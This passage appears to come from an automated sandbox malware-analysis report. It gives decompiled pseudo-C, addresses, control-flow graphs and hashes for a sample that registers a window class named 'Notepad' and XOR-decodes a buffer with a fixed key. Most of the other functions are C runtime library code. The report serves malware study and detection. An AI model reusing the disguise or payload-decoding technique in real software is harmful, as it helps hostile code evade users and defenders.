					 *0x413444 = RegisterWindowMessageW(L"commdlg_FindReplace");
					E004021D0(0x4140e0, 0, 0x11f4);
					_t49 = _a4;
					_t87 = 0x30;
					 *0x4140e0 = _t49;
					_t95 = _t87;
					_t84 =  &_v120;
					do {
						 *_t84 = 0;
						_t84 = _t84 + 1;
						_t95 = _t95 - 1;
						__eflags = _t95;
					} while (_t95 != 0);
					_v120.cbSize = _t87;
					_v120.lpfnWndProc = E00401D03;
					_v120.hInstance = _t49;
					_v120.hIcon = LoadIconW(_t49, 0x300);
					_t51 = GetSystemMetrics(0x32);
					_v120.hIconSm = LoadImageW( *0x4140e0, 0x300, 1, GetSystemMetrics(0x31), _t51, 0x8000);
					_v120.hCursor = LoadCursorW(0, 0x7f00);
					_v120.hbrBackground = 6;
					_v120.lpszMenuName = 0x201;
					_v120.lpszClassName = L"Notepad";
					_t56 = RegisterClassExW( &_v120);
					__eflags = _t56;
					if(_t56 != 0) {
						__imp__MonitorFromRect(0x413448, 1);
						_v72.cbSize = 0x28;
						GetMonitorInfoW(_t56,  &_v72);
						__eflags =  *0x4140e4;
						if( *0x4140e4 != 0) {
							E00401C20();
							E00401EAF();
							ShowWindow( *0x4140e4, _a16);
							UpdateWindow( *0x4140e4);
							DragAcceptFiles( *0x4140e4, 1);
							GetCommandLineW();
							_t91 = LoadAcceleratorsW(_a4, 0x203);
							while(1) {
								_t65 = GetMessageW( &_v32, 0, 0, 0);
								__eflags = _t65;
								if(_t65 == 0) {
									break;
								}
								_t67 = IsDialogMessageW( *0x4140e8,  &_v32);
								__eflags = _t67;
								if(_t67 == 0) {
									_t69 = TranslateAcceleratorW( *0x4140e4, _t91,  &_v32);
									__eflags = _t69;
									if(_t69 == 0) {
										TranslateMessage( &_v32);
										DispatchMessageW( &_v32);
									}
								}
							}
							_t74 = _v32.wParam;
							L16:
							return _t74;
						}
						E00401000();
						ExitProcess(1);
					}
					_t74 = 0;
					goto L16;
				} else {
					goto L3;
				}
				do {
					L3:
					asm("cdq");
					_t92 = 0xc;
					_t86 = _t83 % _t92;
					 *(_t94 + _t83) =  *(_t94 + _t83) ^  *("248058040134" + _t83 % _t92);
					_t83 = _t83 + 1;
					__eflags = _t83 - _a12;
				} while (_t83 < _a12);
				goto L4;
			}






























                                                    0x00401eeb
                                                    0x00401ef9
                                                    0x00401f02
                                                    0x00401f11
                                                    0x00000000
                                                    0x00401f13
                                                    0x00401f23
                                                    0x00401f28
                                                    0x00401f2c
                                                    0x00401f2e
                                                    0x00401f2f
                                                    0x00401f30
                                                    0x00401f35
                                                    0x00401f36
                                                    0x00401f3b
                                                    0x00401f3c
                                                    0x00401f3d
                                                    0x00401f3e
                                                    0x00401f41
                                                    0x00401f54
                                                    0x00401f60
                                                    0x00401f63
                                                    0x00401f6b
                                                    0x00401f6d
                                                    0x00401f70
                                                    0x00401f89
                                                    0x00401f89
                                                    0x00401f8b
                                                    0x00401f91
                                                    0x00401fac
                                                    0x00401fb2
                                                    0x00401fb7
                                                    0x00401fbf
                                                    0x00401fc0
                                                    0x00401fc5
                                                    0x00401fc7
                                                    0x00401fca
                                                    0x00401fca
                                                    0x00401fcc
                                                    0x00401fcd
                                                    0x00401fcd
                                                    0x00401fcd
                                                    0x00401fd7
                                                    0x00401fda
                                                    0x00401fe1
                                                    0x00401ff7
                                                    0x00401ffa
                                                    0x00402019
                                                    0x00402022
                                                    0x00402029
                                                    0x00402030
                                                    0x00402037
                                                    0x0040203e
                                                    0x00402044
                                                    0x00402047
                                                    0x00402056
                                                    0x00402061
                                                    0x00402068
                                                    0x0040206e
                                                    0x00402074
                                                    0x00402082
                                                    0x00402087
                                                    0x00402095
                                                    0x004020a1
                                                    0x004020ae
                                                    0x004020b4
                                                    0x004020ce
                                                    0x0040210f
                                                    0x00402116
                                                    0x00402118
                                                    0x0040211a
                                                    0x00000000
                                                    0x00000000
                                                    0x004020dc
                                                    0x004020e2
                                                    0x004020e4
                                                    0x004020f1
                                                    0x004020f7
                                                    0x004020f9
                                                    0x004020ff
                                                    0x00402109
                                                    0x00402109
                                                    0x004020f9
                                                    0x004020e4
                                                    0x0040211c
                                                    0x0040211f
                                                    0x00000000
                                                    0x0040211f
                                                    0x00402076
                                                    0x0040207c
                                                    0x0040207c
                                                    0x00402049
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00401f72
                                                    0x00401f72
                                                    0x00401f74
                                                    0x00401f77
                                                    0x00401f78
                                                    0x00401f80
                                                    0x00401f83
                                                    0x00401f84
                                                    0x00401f84
                                                    0x00000000

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.302708322.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.302694562.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.302784618.000000000040E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.302795509.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID: Load$CountMetricsRegisterSystemTick_fseek$AllocClassCursorIconImageMessageSleepVirtualWindow__fread_nolock_memset
                                                    • String ID: ($commdlg_FindReplace$@
                                                    • API String ID: 2123373987-1218858168
                                                    • Opcode ID: 44f32737a19a591165ad9582e77b1c2fb2bbe2355112326876d48d35f290f9fd
                                                    • Instruction ID: f8d9d8cddaf214566e9e6d67d0d745017275f5f081cf46b009536bcdcc0b46cf
                                                    • Opcode Fuzzy Hash: 44f32737a19a591165ad9582e77b1c2fb2bbe2355112326876d48d35f290f9fd
                                                    • Instruction Fuzzy Hash: AA51C171900205ABDB11AFB2DE4DA9E7F7CFB48344F10483AF601B61A1D7B85921CB69
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004026DB Relevance: 7.7, APIs: 5, Instructions: 160COMMONLIBRARYCODE
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 39 4026db-4026f7 40 402713 39->40 41 4026f9-4026fd 39->41 42 402715-402719 40->42 41->40 43 4026ff-402701 41->43 44 402703-402708 call 403090 43->44 45 40271a-40271f 43->45 55 40270e call 40303e 44->55 47 402721-40272b 45->47 48 40272d-402730 45->48 47->48 50 40274e-40275e 47->50 51 402732-40273b call 4021d0 48->51 52 40273e-402740 48->52 53 402760-402766 50->53 54 402768 50->54 51->52 52->44 57 402742-40274c 52->57 58 40276f-402771 53->58 54->58 55->40 57->44 57->50 61 402851-402854 58->61 62 402777-40277e 58->62 61->42 63 402780-402785 62->63 64 4027c4-4027c7 62->64 63->64 65 402787 63->65 66 402825-402826 call 404a24 64->66 67 4027c9-4027cd 64->67 68 40278d-402791 65->68 69 40287f 65->69 78 40282b-40282f 66->78 71 4027ee-4027f5 67->71 72 4027cf-4027d8 67->72 75 402793 68->75 76 402795-402798 68->76 77 402883-40288c 69->77 73 4027f7 71->73 74 4027f9-4027fc 71->74 79 4027e3-4027e8 72->79 80 4027da-4027e1 72->80 73->74 82 402859-40285d 74->82 83 4027fe-40280a call 4051f3 call 4050fd 74->83 75->76 76->82 84 40279e-4027bf call 405219 76->84 77->42 78->77 85 402831-402835 78->85 81 4027ea-4027ec 79->81 80->81 81->74 87 40286f-40287a call 403090 82->87 88 40285f-40286c call 4021d0 82->88 99 40280f-402814 83->99 91 402849-40284b 84->91 85->82 86 402837-402846 85->86 86->91 87->55 88->87 91->61 91->62 100 402891-402895 99->100 101 402816-402819 99->101 100->77 101->69 102 40281b-402823 101->102 102->91
                                                    C-Code - Quality: 97%
                                                    			E004026DB(char* _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20) {
				signed int _v8;
				char* _v12;
				signed int _v16;
				signed int _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t82;
				char _t89;
				signed int _t96;
				signed int _t98;
				signed int _t101;
				signed int _t104;
				signed int _t108;
				signed int _t109;
				char* _t110;
				signed int _t120;
				signed int _t123;
				signed int _t124;
				signed int _t125;
				signed int _t126;
				void* _t127;

				_t110 = _a4;
				_t108 = _a8;
				_t123 = _a12;
				_v12 = _t110;
				_v8 = _t108;
				if(_t123 == 0 || _a16 == 0) {
					L5:
					return 0;
				} else {
					_t131 = _t110;
					if(_t110 != 0) {
						_t126 = _a20;
						__eflags = _t126;
						if(_t126 == 0) {
							L9:
							__eflags = _t108 - 0xffffffff;
							if(_t108 != 0xffffffff) {
								_t82 = E004021D0(_t110, 0, _t108);
								_t127 = _t127 + 0xc;
							}
							__eflags = _t126;
							if(__eflags == 0) {
								goto L3;
							} else {
								__eflags = _a16 - (_t82 | 0xffffffff) / _t123;
								if(__eflags > 0) {
									goto L3;
								}
								L13:
								_t124 = _t123 * _a16;
								__eflags =  *(_t126 + 0xc) & 0x0000010c;
								_v20 = _t124;
								_t109 = _t124;
								if(( *(_t126 + 0xc) & 0x0000010c) == 0) {
									_v16 = 0x1000;
								} else {
									_v16 =  *((intOrPtr*)(_t126 + 0x18));
								}
								__eflags = _t124;
								if(_t124 == 0) {
									L40:
									return _a16;
								} else {
									do {
										__eflags =  *(_t126 + 0xc) & 0x0000010c;
										if(( *(_t126 + 0xc) & 0x0000010c) == 0) {
											L24:
											__eflags = _t109 - _v16;
											if(_t109 < _v16) {
												_t89 = E00404A24(_t109, _t124, _t126); // executed
												__eflags = _t89 - 0xffffffff;
												if(_t89 == 0xffffffff) {
													L45:
													return (_t124 - _t109) / _a12;
												}
												__eflags = _v8;
												if(_v8 == 0) {
													L41:
													__eflags = _a8 - 0xffffffff;
													if(__eflags != 0) {
														E004021D0(_a4, 0, _a8);
													}
													 *((intOrPtr*)(E00403090(__eflags))) = 0x22;
													L4:
													E0040303E();
													goto L5;
												}
												_v12 = _v12 + 1;
												 *_v12 = _t89;
												_t109 = _t109 - 1;
												_t65 =  &_v8;
												 *_t65 = _v8 - 1;
												__eflags =  *_t65;
												_v16 =  *((intOrPtr*)(_t126 + 0x18));
												goto L39;
											}
											__eflags = _v16;
											if(_v16 == 0) {
												_t96 = 0x7fffffff;
												__eflags = _t109 - 0x7fffffff;
												if(_t109 <= 0x7fffffff) {
													_t96 = _t109;
												}
											} else {
												__eflags = _t109 - 0x7fffffff;
												if(_t109 <= 0x7fffffff) {
													_t50 = _t109 % _v16;
													__eflags = _t50;
													_t120 = _t50;
													_t101 = _t109;
												} else {
													_t120 = 0x7fffffff % _v16;
													_t101 = 0x7fffffff;
												}
												_t96 = _t101 - _t120;
											}
											__eflags = _t96 - _v8;
											if(_t96 > _v8) {
												goto L41;
											} else {
												_push(_t96);
												_push(_v12);
												_push(E004051F3(_t126)); // executed
												_t98 = E004050FD(_t109, _t124, _t126, __eflags); // executed
												_t127 = _t127 + 0xc;
												__eflags = _t98;
												if(_t98 == 0) {
													 *(_t126 + 0xc) =  *(_t126 + 0xc) | 0x00000010;
													goto L45;
												}
												__eflags = _t98 - 0xffffffff;
												if(_t98 == 0xffffffff) {
													L44:
													_t72 = _t126 + 0xc;
													 *_t72 =  *(_t126 + 0xc) | 0x00000020;
													__eflags =  *_t72;
													goto L45;
												}
												_v12 = _v12 + _t98;
												_t109 = _t109 - _t98;
												_v8 = _v8 - _t98;
												goto L39;
											}
										}
										_t104 =  *(_t126 + 4);
										__eflags = _t104;
										if(__eflags == 0) {
											goto L24;
										}
										if(__eflags < 0) {
											goto L44;
										}
										_t125 = _t109;
										__eflags = _t109 - _t104;
										if(_t109 >= _t104) {
											_t125 = _t104;
										}
										__eflags = _t125 - _v8;
										if(_t125 > _v8) {
											goto L41;
										} else {
											E00405219(_v12, _v8,  *_t126, _t125);
											 *(_t126 + 4) =  *(_t126 + 4) - _t125;
											 *_t126 =  *_t126 + _t125;
											_v12 = _v12 + _t125;
											_t109 = _t109 - _t125;
											_t127 = _t127 + 0x10;
											_v8 = _v8 - _t125;
											_t124 = _v20;
										}
										L39:
										__eflags = _t109;
									} while (_t109 != 0);
									goto L40;
								}
							}
						}
						_t82 = (_t82 | 0xffffffff) / _t123;
						__eflags = _a16 - _t82;
						if(_a16 <= _t82) {
							goto L13;
						}
						goto L9;
					}
					L3:
					 *((intOrPtr*)(E00403090(_t131))) = 0x16;
					goto L4;
				}
			}


























                                                    0x004026e3
                                                    0x004026e7
                                                    0x004026ec
                                                    0x004026ef
                                                    0x004026f2
                                                    0x004026f7
                                                    0x00402713
                                                    0x00000000
                                                    0x004026ff
                                                    0x004026ff
                                                    0x00402701
                                                    0x0040271a
                                                    0x0040271d
                                                    0x0040271f
                                                    0x0040272d
                                                    0x0040272d
                                                    0x00402730
                                                    0x00402736
                                                    0x0040273b
                                                    0x0040273b
                                                    0x0040273e
                                                    0x00402740
                                                    0x00000000
                                                    0x00402742
                                                    0x00402749
                                                    0x0040274c
                                                    0x00000000
                                                    0x00000000
                                                    0x0040274e
                                                    0x0040274e
                                                    0x00402752
                                                    0x00402759
                                                    0x0040275c
                                                    0x0040275e
                                                    0x00402768
                                                    0x00402760
                                                    0x00402763
                                                    0x00402763
                                                    0x0040276f
                                                    0x00402771
                                                    0x00402851
                                                    0x00000000
                                                    0x00402777
                                                    0x00402777
                                                    0x00402777
                                                    0x0040277e
                                                    0x004027c4
                                                    0x004027c4
                                                    0x004027c7
                                                    0x00402826
                                                    0x0040282c
                                                    0x0040282f
                                                    0x00402883
                                                    0x00000000
                                                    0x00402889
                                                    0x00402831
                                                    0x00402835
                                                    0x00402859
                                                    0x00402859
                                                    0x0040285d
                                                    0x00402867
                                                    0x0040286c
                                                    0x00402874
                                                    0x0040270e
                                                    0x0040270e
                                                    0x00000000
                                                    0x0040270e
                                                    0x0040283a
                                                    0x0040283d
                                                    0x00402842
                                                    0x00402843
                                                    0x00402843
                                                    0x00402843
                                                    0x00402846
                                                    0x00000000
                                                    0x00402846
                                                    0x004027c9
                                                    0x004027cd
                                                    0x004027ee
                                                    0x004027f3
                                                    0x004027f5
                                                    0x004027f7
                                                    0x004027f7
                                                    0x004027cf
                                                    0x004027d6
                                                    0x004027d8
                                                    0x004027e5
                                                    0x004027e5
                                                    0x004027e5
                                                    0x004027e8
                                                    0x004027da
                                                    0x004027dc
                                                    0x004027df
                                                    0x004027df
                                                    0x004027ea
                                                    0x004027ea
                                                    0x004027f9
                                                    0x004027fc
                                                    0x00000000
                                                    0x004027fe
                                                    0x004027fe
                                                    0x004027ff
                                                    0x00402809
                                                    0x0040280a
                                                    0x0040280f
                                                    0x00402812
                                                    0x00402814
                                                    0x00402891
                                                    0x00000000
                                                    0x00402891
                                                    0x00402816
                                                    0x00402819
                                                    0x0040287f
                                                    0x0040287f
                                                    0x0040287f
                                                    0x0040287f
                                                    0x00000000
                                                    0x0040287f
                                                    0x0040281b
                                                    0x0040281e
                                                    0x00402820
                                                    0x00000000
                                                    0x00402820
                                                    0x004027fc
                                                    0x00402780
                                                    0x00402783
                                                    0x00402785
                                                    0x00000000
                                                    0x00000000
                                                    0x00402787
                                                    0x00000000
                                                    0x00000000
                                                    0x0040278d
                                                    0x0040278f
                                                    0x00402791
                                                    0x00402793
                                                    0x00402793
                                                    0x00402795
                                                    0x00402798
                                                    0x00000000
                                                    0x0040279e
                                                    0x004027a7
                                                    0x004027ac
                                                    0x004027af
                                                    0x004027b1
                                                    0x004027b4
                                                    0x004027b6
                                                    0x004027b9
                                                    0x004027bc
                                                    0x004027bc
                                                    0x00402849
                                                    0x00402849
                                                    0x00402849
                                                    0x00000000
                                                    0x00402777
                                                    0x00402771
                                                    0x00402740
                                                    0x00402726
                                                    0x00402728
                                                    0x0040272b
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x0040272b
                                                    0x00402703
                                                    0x00402708
                                                    0x00000000
                                                    0x00402708

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.302708322.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.302694562.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.302784618.000000000040E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.302795509.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID: _memset$__filbuf__getptd_noexit__read_memcpy_s
                                                    • String ID:
                                                    • API String ID: 4048096073-0
                                                    • Opcode ID: 31e29cf103b4e9db7af7d15cf90f972655dd6d6aca6dbbc0ff9a7426f935a07f
                                                    • Instruction ID: 2d4d6f091d9caddf48f82abed072715e229d20b414dc2e1a1aaf28c093fdf60b
                                                    • Opcode Fuzzy Hash: 31e29cf103b4e9db7af7d15cf90f972655dd6d6aca6dbbc0ff9a7426f935a07f
                                                    • Instruction Fuzzy Hash: EC51E935A00205DBCB249FB98A4C69FB7B1AF40324F24867BE821772D0D7B89E41DB59
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0040ADD1 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 52memoryCOMMONLIBRARYCODE
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 103 40add1-40addb 104 40adf8-40ae01 103->104 105 40addd-40ade7 103->105 107 40ae03 104->107 108 40ae04-40ae09 104->108 105->104 106 40ade9-40adf7 call 403090 105->106 107->108 110 40ae0b-40ae1c RtlAllocateHeap 108->110 111 40ae1e-40ae25 108->111 110->111 113 40ae50-40ae52 110->113 114 40ae43-40ae48 111->114 115 40ae27-40ae30 call 40851f 111->115 114->113 116 40ae4a 114->116 115->108 119 40ae32-40ae37 115->119 116->113 120 40ae39 119->120 121 40ae3f-40ae41 119->121 120->121 121->113
                                                    C-Code - Quality: 86%
                                                    			E0040ADD1(signed int _a4, signed int _a8, char _a12) {
				void* _t10;
				long _t11;
				long _t12;
				signed int _t13;
				signed int _t17;
				long _t19;
				long _t24;

				_t17 = _a4;
				if(_t17 == 0) {
					L3:
					_t24 = _t17 * _a8;
					__eflags = _t24;
					if(_t24 == 0) {
						_t24 = _t24 + 1;
						__eflags = _t24;
					}
					goto L5;
					L6:
					_t10 = RtlAllocateHeap( *0x413c10, 8, _t24); // executed
					__eflags = 0;
					if(0 == 0) {
						goto L7;
					}
					L14:
					return _t10;
					goto L15;
					L7:
					__eflags =  *0x4140d8;
					if( *0x4140d8 == 0) {
						_t9 =  &_a12; // 0x40e748
						_t19 =  *_t9;
						__eflags = _t19;
						if(_t19 != 0) {
							 *_t19 = 0xc;
						}
					} else {
						_t11 = E0040851F(_t10, _t24);
						__eflags = _t11;
						if(_t11 != 0) {
							L5:
							_t10 = 0;
							__eflags = _t24 - 0xffffffe0;
							if(_t24 > 0xffffffe0) {
								goto L7;
							} else {
								goto L6;
							}
						} else {
							_t8 =  &_a12; // 0x40e748
							_t12 =  *_t8;
							__eflags = _t12;
							if(_t12 != 0) {
								 *_t12 = 0xc;
							}
							_t10 = 0;
						}
					}
					goto L14;
				} else {
					_t13 = 0xffffffe0;
					_t27 = _t13 / _t17 - _a8;
					if(_t13 / _t17 >= _a8) {
						goto L3;
					} else {
						 *((intOrPtr*)(E00403090(_t27))) = 0xc;
						return 0;
					}
				}
				L15:
			}










                                                    0x0040add6
                                                    0x0040addb
                                                    0x0040adf8
                                                    0x0040adfd
                                                    0x0040adff
                                                    0x0040ae01
                                                    0x0040ae03
                                                    0x0040ae03
                                                    0x0040ae03
                                                    0x00000000
                                                    0x0040ae0b
                                                    0x0040ae14
                                                    0x0040ae1a
                                                    0x0040ae1c
                                                    0x00000000
                                                    0x00000000
                                                    0x0040ae50
                                                    0x0040ae52
                                                    0x00000000
                                                    0x0040ae1e
                                                    0x0040ae1e
                                                    0x0040ae25
                                                    0x0040ae43
                                                    0x0040ae43
                                                    0x0040ae46
                                                    0x0040ae48
                                                    0x0040ae4a
                                                    0x0040ae4a
                                                    0x0040ae27
                                                    0x0040ae28
                                                    0x0040ae2e
                                                    0x0040ae30
                                                    0x0040ae04
                                                    0x0040ae04
                                                    0x0040ae06
                                                    0x0040ae09
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x0040ae32
                                                    0x0040ae32
                                                    0x0040ae32
                                                    0x0040ae35
                                                    0x0040ae37
                                                    0x0040ae39
                                                    0x0040ae39
                                                    0x0040ae3f
                                                    0x0040ae3f
                                                    0x0040ae30
                                                    0x00000000
                                                    0x0040addd
                                                    0x0040ade1
                                                    0x0040ade4
                                                    0x0040ade7
                                                    0x00000000
                                                    0x0040ade9
                                                    0x0040adee
                                                    0x0040adf7
                                                    0x0040adf7
                                                    0x0040ade7
                                                    0x00000000

                                                    APIs
                                                    • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00407E29,?,?,00000000,00000000,00000000,?,004066AF,00000001,00000214,?,00401F28), ref: 0040AE14
                                                      • Part of subcall function 00403090: __getptd_noexit.LIBCMT ref: 00403090
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.302708322.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.302694562.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.302784618.000000000040E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.302795509.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID: AllocateHeap__getptd_noexit
                                                    • String ID: H@
                                                    • API String ID: 328603210-3372785075
                                                    • Opcode ID: 989d30b0a1338670e97b4e78f9e573adbf901e8ccbd854da211006b22b413e22
                                                    • Instruction ID: f72a70409694f7b6ffeab95210ea5017d346efd48897b39de9affb82da31d3c0
                                                    • Opcode Fuzzy Hash: 989d30b0a1338670e97b4e78f9e573adbf901e8ccbd854da211006b22b413e22
                                                    • Instruction Fuzzy Hash: 1101D4312413159BEB289F35DC44B6B3796AF81765F00853BF829EB6D0DB38CC6086DA
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00402897 Relevance: 3.0, APIs: 2, Instructions: 40COMMONLIBRARYCODE
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 122 402897-4028ab call 405290 125 4028dc 122->125 126 4028ad-4028b0 122->126 127 4028de-4028e3 call 4052d5 125->127 126->125 128 4028b2-4028b5 126->128 130 4028e4-4028ff call 4033c4 call 4026db 128->130 131 4028b7-4028bb 128->131 143 402904-402919 call 40291b 130->143 134 4028cc-4028d7 call 403090 call 40303e 131->134 135 4028bd-4028c9 call 4021d0 131->135 134->125 135->134 143->127
                                                    C-Code - Quality: 88%
                                                    			E00402897(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t19;
				intOrPtr _t22;
				void* _t33;

				_push(0xc);
				_push(0x410068);
				E00405290(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t33 - 0x1c)) = 0;
				if( *((intOrPtr*)(_t33 + 0x10)) == 0 ||  *((intOrPtr*)(_t33 + 0x14)) == 0) {
					L6:
					_t19 = 0;
				} else {
					if( *((intOrPtr*)(_t33 + 0x18)) != 0) {
						E004033C4( *((intOrPtr*)(_t33 + 0x18)));
						 *((intOrPtr*)(_t33 - 4)) = 0;
						_t22 = E004026DB( *((intOrPtr*)(_t33 + 8)),  *((intOrPtr*)(_t33 + 0xc)),  *((intOrPtr*)(_t33 + 0x10)),  *((intOrPtr*)(_t33 + 0x14)),  *((intOrPtr*)(_t33 + 0x18))); // executed
						 *((intOrPtr*)(_t33 - 0x1c)) = _t22;
						 *((intOrPtr*)(_t33 - 4)) = 0xfffffffe;
						E0040291B();
						_t19 =  *((intOrPtr*)(_t33 - 0x1c));
					} else {
						_t41 =  *((intOrPtr*)(_t33 + 0xc)) - 0xffffffff;
						if( *((intOrPtr*)(_t33 + 0xc)) != 0xffffffff) {
							E004021D0( *((intOrPtr*)(_t33 + 8)), 0,  *((intOrPtr*)(_t33 + 0xc)));
						}
						 *((intOrPtr*)(E00403090(_t41))) = 0x16;
						E0040303E();
						goto L6;
					}
				}
				return E004052D5(_t19);
			}






                                                    0x00402897
                                                    0x00402899
                                                    0x0040289e
                                                    0x004028a5
                                                    0x004028ab
                                                    0x004028dc
                                                    0x004028dc
                                                    0x004028b2
                                                    0x004028b5
                                                    0x004028e7
                                                    0x004028ed
                                                    0x004028ff
                                                    0x00402907
                                                    0x0040290a
                                                    0x00402911
                                                    0x00402916
                                                    0x004028b7
                                                    0x004028b7
                                                    0x004028bb
                                                    0x004028c4
                                                    0x004028c9
                                                    0x004028d1
                                                    0x004028d7
                                                    0x00000000
                                                    0x004028d7
                                                    0x004028b5
                                                    0x004028e3

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.302708322.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.302694562.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.302784618.000000000040E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.302795509.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID: __lock_file_memset
                                                    • String ID:
                                                    • API String ID: 26237723-0
                                                    • Opcode ID: dcc172975523d464ee4fc30bba6a40e37ed393400d9984883f6ae05b6d93b111
                                                    • Instruction ID: 9d2e47bad17b9502f4ca76dfba9924e6714e9b43e2e2b17fa324c4d89a62bc0c
                                                    • Opcode Fuzzy Hash: dcc172975523d464ee4fc30bba6a40e37ed393400d9984883f6ae05b6d93b111
                                                    • Instruction Fuzzy Hash: 1D014C72800209EBCF12AFA6C90A59F7F21AF04724F10823BF814361D1C7B986A1DF99
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00402AD6 Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    C-Code - Quality: 86%
                                                    			E00402AD6(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int _t15;
				signed int _t17;
				void* _t26;
				intOrPtr _t28;

				_push(0xc);
				_push(0x410088);
				E00405290(__ebx, __edi, __esi);
				_t28 =  *((intOrPtr*)(_t26 + 8));
				_t29 = _t28 != 0;
				if(_t28 != 0) {
					E004033C4( *((intOrPtr*)(_t26 + 8)));
					_t5 = _t26 - 4;
					 *_t5 =  *(_t26 - 4) & 0x00000000;
					__eflags =  *_t5;
					_t15 = E00402942( *((intOrPtr*)(_t26 + 8))); // executed
					 *(_t26 - 0x1c) = _t15;
					 *(_t26 - 4) = 0xfffffffe;
					E00402B31();
					_t17 =  *(_t26 - 0x1c);
				} else {
					 *((intOrPtr*)(E00403090(_t29))) = 0x16;
					_t17 = E0040303E() | 0xffffffff;
				}
				return E004052D5(_t17);
			}







                                                    0x00402ad6
                                                    0x00402ad8
                                                    0x00402add
                                                    0x00402ae4
                                                    0x00402aea
                                                    0x00402aec
                                                    0x00402b06
                                                    0x00402b0c
                                                    0x00402b0c
                                                    0x00402b0c
                                                    0x00402b13
                                                    0x00402b19
                                                    0x00402b1c
                                                    0x00402b23
                                                    0x00402b28
                                                    0x00402aee
                                                    0x00402af3
                                                    0x00402afe
                                                    0x00402afe
                                                    0x00402b30

                                                    APIs
                                                    • __lock_file.LIBCMT ref: 00402B06
                                                    • __ftell_nolock.LIBCMT ref: 00402B13
                                                      • Part of subcall function 00403090: __getptd_noexit.LIBCMT ref: 00403090
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.302708322.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.302694562.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.302784618.000000000040E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.302795509.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID: __ftell_nolock__getptd_noexit__lock_file
                                                    • String ID:
                                                    • API String ID: 2999321469-0
                                                    • Opcode ID: 4e832fb78bcbfa21ba064239772e938595aab44c3a016d550af379149bf0d65b
                                                    • Instruction ID: b711b2e45de9c17b5bf80e9ffac99842ef358d2f377edfc59ed9bd3c7883c406
                                                    • Opcode Fuzzy Hash: 4e832fb78bcbfa21ba064239772e938595aab44c3a016d550af379149bf0d65b
                                                    • Instruction Fuzzy Hash: D1F03030911205AADB11BF76D94B79E7BB4AF00369F20827FB414B91E1CBBC8681DB59
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00402CFD Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 164 402cfd-402d13 call 402c41
                                                    C-Code - Quality: 25%
